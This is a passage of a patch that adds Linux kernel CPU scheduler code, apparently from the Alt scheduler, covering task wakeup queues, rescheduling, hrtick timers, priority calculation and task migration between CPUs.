++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
++
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do similar optimization for completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/**
++	 * Alt schedule FW doesn't support sched_feat yet
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	trace_sched_migrate_task(p, new_cpu);
++
++	if (task_cpu(p) != new_cpu)
++	{
++		rseq_migrate(p);
++		perf_event_task_migrate(p);
++	}
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_preempt_mask(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
++{
++	cpumask_copy(&p->cpus_mask, new_mask);
++	p->nr_cpus_allowed = cpumask_weight(new_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, new_mask);
++}
++
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	__do_set_cpus_allowed(p, new_mask);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	if (!src->user_cpus_ptr)
++		return 0;
++
++	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!dst->user_cpus_ptr)
++		return -ENOMEM;
++
++	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    avoid the load balancer to place new tasks on the to be removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select the CPU on the other node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
